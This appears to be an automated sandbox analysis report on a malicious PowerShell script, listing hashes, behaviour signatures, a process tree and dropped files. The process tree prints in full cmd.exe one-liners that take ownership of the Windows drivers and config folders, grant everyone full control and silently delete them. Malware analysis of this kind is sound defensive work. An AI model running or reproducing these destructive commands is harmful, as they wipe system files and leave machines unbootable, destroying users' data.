Analysis

  • max time kernel
    35s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-08-2024 20:55

General

  • Target

    trigger.ps1

  • Size

    1KB

  • MD5

    84cb1e2083b8106b83a45c6aa00dd55d

  • SHA1

    e12ea5b7deb81774acb89088dc1f2dce755782e9

  • SHA256

    735116a2700250eb6865f98ebef5519c9de350fde9fc5bb0a3b3c18a63486c78

  • SHA512

    4b01e6fcd0776596cf39de15cf7b8777f508246c6fb0f0023067db9116d364bd4693b71d9273c942c9357f18a2a631ec698b7e0a00d3f239da90df0b882e5e3a

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4836
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gj21yse0\gj21yse0.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5036
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB853.tmp" "c:\Users\Admin\AppData\Local\Temp\gj21yse0\CSCE78DAEE45C64C88A02D24983DFF65.TMP"
        3⤵
          PID:4912
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3496
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\drivers\*
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3280
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\drivers\* /grant everyone:(f)
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1156
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:764
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\config\*
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:464
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\config\* /grant everyone:(f)
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2444

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESB853.tmp

      Filesize

      1KB

      MD5

      801f096aa731f0143562fe45221d1ce2

      SHA1

      a7c5bfbfab02d179f035fa9fe0880bf3c05a7972

      SHA256

      1f9c794c8da614cba9d38cd3496bc4f6ddf22d75bc724f8e589fe96feee4e3f1

      SHA512

      b0db5b09456a3f46d54da1397087399e60818fe04648cc6f3e57815e9476d138d3595e554b70e20b8d79870c60acfe2423770fde5b4e1cbd9e879965437b68ab

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ijlmm3zd.m0q.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\gj21yse0\gj21yse0.dll

      Filesize

      3KB

      MD5

      7614d3cdbb521274796a372b1285d79e

      SHA1

      c1dcb355c8a967fbff1e3bd1e7c3a9cdebe74215

      SHA256

      ca03f03349e56cd4e43e9140e8f1798003cdaea4d0c216b664514d9369b57cdd

      SHA512

      4a64461e115c636ed24104813f0f19acb28a5d77e04ef453e7bfb8231620c2ccd6962314aa2cd9d4341b4ef58b650fd88b1c7c5664601425d5eb7b12b809d3da

    • \??\c:\Users\Admin\AppData\Local\Temp\gj21yse0\CSCE78DAEE45C64C88A02D24983DFF65.TMP

      Filesize

      652B

      MD5

      23d46548ea27a772f93cbea7cc2a5df4

      SHA1

      42b4fe29c76df577432c7e541a5bb2b93a3ce5a5

      SHA256

      ada62ac865e2f9afe8d2619ae85fe3728930f2aa8e75f2aafe95dd3b6063a4e2

      SHA512

      5c19ade94b0e64c36086423ba57140e077ee217a72700840924e2e36ffe666f987a7eadbef6d45ceb97bea746ad6e6d8db56effcf8d55bb6157fe42d7f1291e9

    • \??\c:\Users\Admin\AppData\Local\Temp\gj21yse0\gj21yse0.0.cs

      Filesize

      819B

      MD5

      41f8d18f0172904a2236dd9396ead480

      SHA1

      35e7150c927b97b26d922f07a51e8fe833752933

      SHA256

      d842c81d3641d456116098208a48542a96d5e4d256169069189e459cc265cef5

      SHA512

      43dea5a479cf203bde58b412ac1ca7c064048e7d4544b2ef4354773a1805ccba2b85e6772466da0b9409fadaaa0f6f49654ed1e33a9ef75a4d43c3f058773da3

    • \??\c:\Users\Admin\AppData\Local\Temp\gj21yse0\gj21yse0.cmdline

      Filesize

      369B

      MD5

      06152dd5fff67d3e5fc4cea2085eff4f

      SHA1

      39a45416c4398385637f05a79f9902b2bd2ad0ad

      SHA256

      69abf9bd9fbbd31cf31ebb9d2cc4f635751430d5b3bd3ff77b9e2169193137dd

      SHA512

      7f90526e8c77005a67626b6fa91028adfec02932b2647e0d58a9d192b7f6af17e7f975cd19c8acecc13a7df922df0640241d70aae7a484978b0c376b851dc96c

    • memory/4836-0-0x00007FF9CAE13000-0x00007FF9CAE15000-memory.dmp

      Filesize

      8KB

    • memory/4836-12-0x00007FF9CAE10000-0x00007FF9CB8D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4836-11-0x00007FF9CAE10000-0x00007FF9CB8D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4836-10-0x000001944A6F0000-0x000001944A712000-memory.dmp

      Filesize

      136KB

    • memory/4836-25-0x000001944A520000-0x000001944A528000-memory.dmp

      Filesize

      32KB

    • memory/4836-27-0x0000019462BA0000-0x0000019462DBC000-memory.dmp

      Filesize

      2.1MB

    • memory/4836-29-0x00007FF9CAE13000-0x00007FF9CAE15000-memory.dmp

      Filesize

      8KB

    • memory/4836-30-0x00007FF9CAE10000-0x00007FF9CB8D1000-memory.dmp

      Filesize

      10.8MB